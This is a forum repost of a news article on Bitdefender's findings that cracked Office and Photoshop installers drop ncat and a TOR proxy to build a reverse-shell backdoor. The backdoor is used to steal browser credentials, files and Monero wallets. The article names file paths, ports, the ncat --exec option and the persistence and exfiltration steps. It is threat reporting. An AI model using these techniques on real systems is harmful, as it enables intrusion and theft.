Jump to content

Hackers Target Software Cracks And BitTorrent Client To Steal Browser Data And Cryptocurrency


Recommended Posts

Researchers from cybersecurity company Bitdefender have warned that hackers are actively exploiting software cracks in pirated versions of Microsoft Office and Adobe Photoshop CC to empty people’s cryptocurrency wallets.

Bitdefender analysts recently uncovered a series of attacks that leverage office tools and image-editing software cracks to compromise computers, hijack crypto-currency wallets, and exfiltrate information via the TOR network.

“Once executed, the crack drops an instance of ncat.exe (a legitimate tool to send raw data over the network) as well as a TOR proxy,” said Bitdefender’s Bogdan Botezatu, Director of Threat Research and Reporting and Security Researcher Eduard Budaca in a blog post.

These files are placed in the system storage identified as ‘%syswow64%-nap.exe’ or ‘%syswow64%-ndc.exe’, and ‘%syswow64-tarsrv.exe’. A batch file is also placed at ‘%syswow64%-chknap.bat’ which contains a command line for the Ncat component dedicated to traversing ports 8000 and 9000 in .onion domains as shown below.

These tools work together to create a powerful backdoor that communicates through TOR with its command and control center: the ncat binary uses the listening port of the TOR proxy (`–proxy 127.0.0.1:9075`) and uses the standard ‘–exec’ parameter, which allows all input from the client to be sent to the application and responses to be sent back to the client over the socket (reverse shell behavior).

The crack also creates persistence mechanisms for the TOR proxy file and the Ncat binary on the compromised machine with a service and a scheduled task that runs every 45 minutes.

According to Bitdefender’s investigation, the backdoor is most likely being used interactively by a human operator rather than sending automated requests to the victims. Some of the actions that were observed by the researchers are:

File exfiltration

BitTorrent client execution to exfiltrate data

Disabling the firewall in preparation for data exfiltration

Stealing of Firefox browser profile data (history, credentials, and session cookies). Before exfiltration, attackers archive the profile folder with 7zip to generate one file that contains everything.

Theft of the Monero wallet via the legitimate CLI client ‘monero-wallet-cli.exe’.

The above list of actions is non-exhaustive, as attackers have complete control of the system and can adapt campaigns based on their current interests.

As per Bitdefender, these types of malware-loaded cracks mostly affect people who download files from websites that have little or no control.

“These cracks are usually hosted on direct-download websites rather than on torrent portals, as the latter have a community that downvotes and flags malicious uploads,” Botezatu told TF.

Currently, distribution of these cracks are mostly found in the United States, India, Canada, Greece, Germany, Italy, Spain, South Africa, and the United Kingdom. For more information about the files and processes involved, you can read Bitdefender’s complete write-up here.

Link to post
Share on other sites

Avoid unnecessary posts such as 'Thank you', 'Welcome', etc. Such posts will be deleted and user will be warned if it happens again. If caught spamming, the following actions are applicable -

  • First time - Warning
  • Second time - 5000 Points will be deducted
  • Third time - Ban for 7 days
  • Fourth time - Permanent Ban

If the post helped you, reward the user by reacting to the post like this -

1.jpg

Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
×
×
  • Create New...

Important Information

By using this site, you agree to our Terms of Use.